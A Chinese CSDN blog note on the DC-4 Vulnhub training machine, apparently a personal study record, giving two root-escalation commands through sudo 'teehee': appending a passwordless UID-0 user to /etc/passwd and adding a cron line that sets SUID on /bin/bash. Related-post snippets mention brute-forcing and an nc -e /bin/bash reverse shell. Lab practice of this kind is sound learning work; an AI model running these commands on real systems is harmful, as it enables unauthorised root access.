DC-4靶机teehee的两种提权

于 2023-12-04 16:28:48 发布
阅读量456 收藏 9
点赞数 9
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laykr/article/details/134786611
版权

1.修改/etc/passwd

       原理: 直接修改/etc/passwd文件,追加一个空密码进入/etc/passwd里

        echo "shinyorb::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

        su shinyorb

2.修改/bin/bash权限

        原理:通过日志更改/bin/bash,使其变成4777也就是suid权限,然后/bin/bash -p强制停下,就有root权限了

        sudo teehee /etc/crontab

        * * * * * root chmod 4777 /bin/bash

        /bin/bash -p

东西不多,个人笔记,记录今天的学习成果

shinyorb
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DC-4 主要在于信息收集和teehee提权
jelly
06-23 432
靶机DC-4 192.168.56.105 攻击机:kali 192.168.56.1 探索靶机 爆破用户 根据登录页面,主要是登录admin用户,我们使用burp爆破。 发现happy过后的密码都能成功登录,估计是服务器验证登录成功后,会记录用户的Cookie,后面每次登录只认证用户的Cookie。 发现命令执行漏洞,获取shell 登录上去 获取命令执行的权利 虽然只能执行这么三条固定命令,但是我们通过burp修改提交的参数 发现这里存在命令执行漏洞 我们
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4靶机渗透(teehee提权
single_g_l的博客
03-26 4770
一、环境 靶机: 192.168.1.177 攻击机: 192.168.1.209 二、信息收集 1. 主机发现 namp -sP 192.168.1.0/24 或 arp-scan -l # 查看开放端口 nmap -A -sS -p- 192.168.1.177 2. 访问192.168.1.177:80 三、拿到管理后台密码 方法1. 用burp爆破模块,获取管理员登录界面的密码 01. 用burp抓包,爆破拿到密码(记得准备一个常用密码合集,...
DC-4靶场练习—teehee提权
negnegil的博客
06-09 607
DC系列第四个靶机 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 老规矩先扫描以下局域网内的主机ip arp-scan -l 扫一下端口: nmap -A -p- 192.168.1.101 只看放了22和80端口,先进80端口看看有什么 只有一个表单,猜测Username应该是admin,先不急着爆破。 用dirsearch扫了一下目录,只有一个登录界面: 所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不
生命在于学习——Linux提权
易水哲的博客
11-03 1654
Linux提权的学习笔记记录。
[Vulnhub] DC-4
weixin_63231007的博客
01-28 823
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
9.100个渗透测试实战#9(DC-4)
qwsn
03-29 2683
时间一切皆可努力 感谢浏览 目录...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
最新发布
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
【Vulnhub靶机渗透测试】之DC-4(teehee命令提权(在passwd或crontab中追加内容))
Pluto.的博客
12-28 978
文章目录Vulnhub靶机渗透测试之DC-2 Vulnhub靶机渗透测试之DC-2 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 ...
Vulnhub DC-4 teehee 提权
ST0new的博客
07-21 1622
Vulnhub 之 DC-4 本文只用于学习知识,不要将其用于非法途径, 前言 DC已经做了一半了,前三次都是基于初学者的,这次的难度就提升了,适合初学者和入门的伙伴。 还是按照常例看看作者是怎么描述的吧。 下载地址 DC-4 描述 DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 ​ 与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。只有一面旗帜,但技术上来说,有...
记一次vulnhub|渗透测试DC-4(常规和非预期提权思路)
crispr的博客
02-02 949
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地提权
Dc-4靶机渗透----burpsuite抓包与爆破、hydra、sudo、teehee提权、/etc/passwd的使用
z2560088的博客
09-27 578
nmap扫描,扫描出80端口和ssh端口 先访问http服务。再用whatweb和dirb扫描该网站,发现既没有cms有没有相关的文件可以查看 那我们只能抓包爆破,或者海德拉爆破,账号其实有提示了大概就是admin,只需破解password即可 爆破得到admin:happy 登录 继续执行命令抓包 修改radio的值 使用nc nc 192.168.160.129 777 -e /bin/bash 改成nc+192.168.160.129+777+-e+/b...
Vulnhub 之 DC-5提权
ST0new的博客
07-23 685
文章目录前言作者描述复现环境开始复现查看flag 前言 本靶机只做学习使用,不要将其利用于非法途径。 终于来到了倒数第二关,这一关将难度增加,所以我们需要借助搜索工具来帮助我们完成 作者描述 DC-5是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 这个计划是为了让DC-5更上一层楼,所以这对初学者来说可能不太好,但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)...
066 渗透测试实战,靶机 DC-4
鸡蛋炒鸡蛋
04-29 431
文章目录一:环境准备 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 打开DC-4
渗透DC-1靶机设计思路
05-24
可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值